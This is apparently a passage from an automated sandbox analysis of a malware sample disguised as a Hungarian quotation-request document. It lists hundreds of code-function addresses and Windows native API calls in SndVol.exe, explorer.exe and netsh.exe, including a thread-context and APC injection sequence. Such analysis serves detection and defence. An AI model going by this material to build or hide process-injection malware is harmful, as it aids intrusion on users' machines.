          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2CC0 NtQueryVirtualMemory,5_2_365D2CC0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2CF0 NtOpenProcess,5_2_365D2CF0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2D00 NtSetInformationFile,5_2_365D2D00
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2DB0 NtEnumerateKey,5_2_365D2DB0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2AF0 NtWriteFile,5_2_365D2AF0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2AB0 NtWaitForSingleObject,5_2_365D2AB0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2BE0 NtQueryValueKey,5_2_365D2BE0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2B80 NtQueryInformationFile,5_2_365D2B80
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2BA0 NtEnumerateValueKey,5_2_365D2BA0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3651A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,5_2_3651A036
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3651A042 NtQueryInformationProcess,5_2_3651A042
          Source: C:\Windows\explorer.exeCode function: 6_2_0E577E12 NtProtectVirtualMemory,6_2_0E577E12
          Source: C:\Windows\explorer.exeCode function: 6_2_0E576232 NtCreateFile,6_2_0E576232
          Source: C:\Windows\explorer.exeCode function: 6_2_0E577E0A NtProtectVirtualMemory,6_2_0E577E0A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2B60 NtClose,LdrInitializeThunk,7_2_038B2B60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2AD0 NtReadFile,LdrInitializeThunk,7_2_038B2AD0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2FE0 NtCreateFile,LdrInitializeThunk,7_2_038B2FE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2F30 NtCreateSection,LdrInitializeThunk,7_2_038B2F30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_038B2EA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2DD0 NtDelayExecution,LdrInitializeThunk,7_2_038B2DD0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_038B2DF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_038B2D10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_038B2CA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2C60 NtCreateKey,LdrInitializeThunk,7_2_038B2C60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_038B2C70
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B35C0 NtCreateMutant,LdrInitializeThunk,7_2_038B35C0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B4340 NtSetContextThread,7_2_038B4340
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B4650 NtSuspendThread,7_2_038B4650
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2B80 NtQueryInformationFile,7_2_038B2B80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2BA0 NtEnumerateValueKey,7_2_038B2BA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2BE0 NtQueryValueKey,7_2_038B2BE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2BF0 NtAllocateVirtualMemory,7_2_038B2BF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2AB0 NtWaitForSingleObject,7_2_038B2AB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2AF0 NtWriteFile,7_2_038B2AF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2F90 NtProtectVirtualMemory,7_2_038B2F90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2FA0 NtQuerySection,7_2_038B2FA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2FB0 NtResumeThread,7_2_038B2FB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2F60 NtCreateProcessEx,7_2_038B2F60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2E80 NtReadVirtualMemory,7_2_038B2E80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2EE0 NtQueueApcThread,7_2_038B2EE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2E30 NtWriteVirtualMemory,7_2_038B2E30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2DB0 NtEnumerateKey,7_2_038B2DB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2D00 NtSetInformationFile,7_2_038B2D00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2D30 NtUnmapViewOfSection,7_2_038B2D30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2CC0 NtQueryVirtualMemory,7_2_038B2CC0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2CF0 NtOpenProcess,7_2_038B2CF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B2C00 NtQueryInformationProcess,7_2_038B2C00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B3090 NtSetValueKey,7_2_038B3090
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B3010 NtOpenDirectoryObject,7_2_038B3010
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B39B0 NtGetContextThread,7_2_038B39B0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B3D10 NtOpenProcessToken,7_2_038B3D10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B3D70 NtOpenThread,7_2_038B3D70
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_00B9A3E0 NtReadFile,7_2_00B9A3E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_00B9A330 NtCreateFile,7_2_00B9A330
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_00B9A460 NtClose,7_2_00B9A460
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_00B9A48A NtReadFile,7_2_00B9A48A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_00B9A45B NtClose,7_2_00B9A45B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_03689BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,7_2_03689BAF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0368A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,7_2_0368A036
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_03689BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_03689BB2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0368A042 NtQueryInformationProcess,7_2_0368A042
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029B8788 CreateProcessAsUserW,0_2_029B8788
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029A20C40_2_029A20C4
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_047DDCDB5_2_047DDCDB
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_047DDD745_2_047DDD74
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_047C2D905_2_047C2D90
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_047C9E605_2_047C9E60
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_047C9E5B5_2_047C9E5B
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_047DEE185_2_047DEE18
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_047C9E1A5_2_047C9E1A
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_047DDEC55_2_047DDEC5
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_047DD72A5_2_047DD72A
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_047C2FB05_2_047C2FB0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_047C10305_2_047C1030
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_047DF0945_2_047DF094
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_047DDAD65_2_047DDAD6
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_047DEB635_2_047DEB63
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365E56305_2_365E5630
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366516CC5_2_366516CC
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665F7B05_2_3665F7B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365914605_2_36591460
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665F43F5_2_3665F43F
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366575715_2_36657571
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366695C35_2_366695C3
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663D5B05_2_3663D5B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BB2C05_2_365BB2C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BD2F05_2_365BD2F0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A52A05_2_365A52A0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658D34C5_2_3658D34C
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665132D5_2_3665132D
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365E739A5_2_365E739A
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665F0E05_2_3665F0E0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366570E95_2_366570E9
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C05_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664F0CC5_2_3664F0CC
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3666B16B5_2_3666B16B
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F1725_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D516C5_2_365D516C
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365AB1B05_2_365AB1B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A9EB05_2_365A9EB0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665FF095_2_3665FF09
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36563FD55_2_36563FD5
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36563FD25_2_36563FD2
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1F925_2_365A1F92
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665FFB15_2_3665FFB1
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36619C325_2_36619C32
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665FCF25_2_3665FCF2
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36657D735_2_36657D73
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A3D405_2_365A3D40
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36651D5A5_2_36651D5A
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BFDC05_2_365BFDC0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36613A6C5_2_36613A6C
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36657A465_2_36657A46
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665FA495_2_3665FA49
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664DAC65_2_3664DAC6
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36641AA35_2_36641AA3
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663DAAC5_2_3663DAAC
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365E5AA05_2_365E5AA0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665FB765_2_3665FB76
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36615BF05_2_36615BF0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365DDBF95_2_365DDBF9
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BFB805_2_365BFB80
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3660D8005_2_3660D800
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A38E05_2_365A38E0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A99505_2_365A9950
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BB9505_2_365BB950
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366359105_2_36635910
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BC6E05_2_365BC6E0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C47505_2_365C4750
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A07705_2_365A0770
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659C7C05_2_3659C7C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366524465_2_36652446
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366444205_2_36644420
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664E4F65_2_3664E4F6
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A05355_2_365A0535
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366605915_2_36660591
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366402745_2_36640274
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366202C05_2_366202C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665A3525_2_3665A352
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366603E65_2_366603E6
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365AE3F05_2_365AE3F0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366320005_2_36632000
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366281585_2_36628158
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365901005_2_36590100
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663A1185_2_3663A118
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366581CC5_2_366581CC
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366541A25_2_366541A2
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366601AA5_2_366601AA
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A0E595_2_365A0E59
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665EE265_2_3665EE26
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665EEDB5_2_3665EEDB
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B2E905_2_365B2E90
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665CE935_2_3665CE93
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36614F405_2_36614F40
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36642F305_2_36642F30
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C0F305_2_365C0F30
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365E2F285_2_365E2F28
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36592FC85_2_36592FC8
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661EFA05_2_3661EFA0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A0C005_2_365A0C00
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36590CF25_2_36590CF2
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36640CB55_2_36640CB5
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365AAD005_2_365AAD00
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663CD1F5_2_3663CD1F
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659ADE05_2_3659ADE0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B8DBF5_2_365B8DBF
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659EA805_2_3659EA80
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665AB405_2_3665AB40
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36656BD75_2_36656BD7
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A28405_2_365A2840
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365AA8405_2_365AA840
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365CE8F05_2_365CE8F0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365868B85_2_365868B8
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B69625_2_365B6962
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3666A9A65_2_3666A9A6
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A29A05_2_365A29A0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3651A0365_2_3651A036
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3651E5CD5_2_3651E5CD
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3651B2325_2_3651B232
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365110825_2_36511082
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36512D025_2_36512D02
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36515B305_2_36515B30
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36515B325_2_36515B32
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365189125_2_36518912
          Source: C:\Windows\explorer.exeCode function: 6_2_0E5762326_2_0E576232
          Source: C:\Windows\explorer.exeCode function: 6_2_0E5750366_2_0E575036
          Source: C:\Windows\explorer.exeCode function: 6_2_0E56C0826_2_0E56C082
          Source: C:\Windows\explorer.exeCode function: 6_2_0E5739126_2_0E573912
          Source: C:\Windows\explorer.exeCode function: 6_2_0E56DD026_2_0E56DD02
          Source: C:\Windows\explorer.exeCode function: 6_2_0E570B326_2_0E570B32
          Source: C:\Windows\explorer.exeCode function: 6_2_0E570B306_2_0E570B30
          Source: C:\Windows\explorer.exeCode function: 6_2_0E5795CD6_2_0E5795CD
          Source: C:\Windows\explorer.exeCode function: 6_2_0FD22B326_2_0FD22B32
          Source: C:\Windows\explorer.exeCode function: 6_2_0FD22B306_2_0FD22B30
          Source: C:\Windows\explorer.exeCode function: 6_2_0FD282326_2_0FD28232
          Source: C:\Windows\explorer.exeCode function: 6_2_0FD2B5CD6_2_0FD2B5CD
          Source: C:\Windows\explorer.exeCode function: 6_2_0FD259126_2_0FD25912
          Source: C:\Windows\explorer.exeCode function: 6_2_0FD1FD026_2_0FD1FD02
          Source: C:\Windows\explorer.exeCode function: 6_2_0FD1E0826_2_0FD1E082
          Source: C:\Windows\explorer.exeCode function: 6_2_0FD270366_2_0FD27036
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_01565EB07_2_01565EB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_039403E67_2_039403E6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0388E3F07_2_0388E3F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0393A3527_2_0393A352
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_039002C07_2_039002C0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_039202747_2_03920274
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_039341A27_2_039341A2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_039401AA7_2_039401AA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_039381CC7_2_039381CC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038701007_2_03870100
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0391A1187_2_0391A118
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_039081587_2_03908158
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_039120007_2_03912000
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0387C7C07_2_0387C7C0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038A47507_2_038A4750
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038807707_2_03880770
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0389C6E07_2_0389C6E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_039405917_2_03940591
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038805357_2_03880535
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0392E4F67_2_0392E4F6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_039244207_2_03924420
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_039324467_2_03932446
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_03936BD77_2_03936BD7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0393AB407_2_0393AB40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0387EA807_2_0387EA80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038829A07_2_038829A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0394A9A67_2_0394A9A6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038969627_2_03896962
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038668B87_2_038668B8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038AE8F07_2_038AE8F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0388A8407_2_0388A840
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038828407_2_03882840
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038FEFA07_2_038FEFA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_03872FC87_2_03872FC8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_03922F307_2_03922F30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038C2F287_2_038C2F28
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038A0F307_2_038A0F30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038F4F407_2_038F4F40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0393CE937_2_0393CE93
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_03892E907_2_03892E90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0393EEDB7_2_0393EEDB
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0393EE267_2_0393EE26
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_03880E597_2_03880E59
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_03898DBF7_2_03898DBF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0387ADE07_2_0387ADE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0388AD007_2_0388AD00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0391CD1F7_2_0391CD1F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_03920CB57_2_03920CB5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_03870CF27_2_03870CF2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_03880C007_2_03880C00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038C739A7_2_038C739A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0393132D7_2_0393132D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0386D34C7_2_0386D34C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038852A07_2_038852A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0389B2C07_2_0389B2C0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0389D2F07_2_0389D2F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_039212ED7_2_039212ED
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0388B1B07_2_0388B1B0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038B516C7_2_038B516C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0386F1727_2_0386F172
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0394B16B7_2_0394B16B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038870C07_2_038870C0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0392F0CC7_2_0392F0CC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0393F0E07_2_0393F0E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_039370E97_2_039370E9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0393F7B07_2_0393F7B0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_039316CC7_2_039316CC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038C56307_2_038C5630
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0391D5B07_2_0391D5B0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_039495C37_2_039495C3
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_039375717_2_03937571
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0393F43F7_2_0393F43F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038714607_2_03871460
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0389FB807_2_0389FB80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038BDBF97_2_038BDBF9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038F5BF07_2_038F5BF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0393FB767_2_0393FB76
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038C5AA07_2_038C5AA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_03921AA37_2_03921AA3
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0391DAAC7_2_0391DAAC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0392DAC67_2_0392DAC6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_03937A467_2_03937A46
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0393FA497_2_0393FA49
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038F3A6C7_2_038F3A6C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_039159107_2_03915910
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038899507_2_03889950
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0389B9507_2_0389B950
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038838E07_2_038838E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038ED8007_2_038ED800
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_03881F927_2_03881F92
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0393FFB17_2_0393FFB1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_03843FD57_2_03843FD5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_03843FD27_2_03843FD2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0393FF097_2_0393FF09
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_03889EB07_2_03889EB0
